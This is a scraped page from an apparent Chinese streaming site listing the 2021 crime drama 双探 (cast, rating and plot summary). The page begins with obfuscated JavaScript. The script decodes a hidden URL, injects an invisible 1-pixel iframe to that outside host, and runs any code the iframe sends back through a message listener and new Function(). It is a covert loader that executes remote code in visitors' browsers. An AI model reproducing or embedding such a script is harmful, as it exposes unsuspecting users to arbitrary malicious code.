if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['aksGSNQ']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'ra' + 'nq' + 'ob' + 'j_4352'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#aksGSNQ'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_4352`]) { var t = x(e.data[`des_s_4352`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'aHR'+'0cH'+'FFM'+'lMF'+'F0E'+'lMk'+'YlM'+'kFF'+'ZqY'+'FFS'+'55F'+'FdX'+'Nod'+'Whh'+'LmN'+'vbS'+'UzQ'+'TFF'+'EwN'+'DQz'+'JTJ'+'FFG'+'YzF'+'FRj'+'YTQ'+'yFF'+'JTJ'+'GYy'+'00M'+'FFz'+'UyF'+'FLT'+'IFF'+'1LT'+'FFE'+'uZF'+'Fm9'+'0', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

双探

评分:
2.0 较差

分类:国产剧 内地 2021

主演:段奕宏  大鹏  曾美慧孜  郑楚一  张国强  邢佳栋  刘威葳  刘亦然  申琦  张林  衣云鹤  冯兵  董博  朱..   

导演:费聿竹  陈宙飞   

京城刑警李慧炎(段奕宏 饰)因一起绑架案,来到东北小城双塔,机缘巧合下,与前来寻找父亲被杀真相的入殓师周游(大鹏 饰)相识。二人意外卷入一宗横跨三十年的恩怨纠葛……夜幕收起,白日笼罩。在一座矗立北方的冻土之城,十二个日夜,向观众揭示一个关于人性的秘密。“双探”于冰冻之 寒下的人性涅槃重生……

详情

猜你喜欢

加载中...

Copyright © 2015-2019 看最新电影就上258R影视网

电影

电视剧

综艺

动漫

影视直播

专题

资讯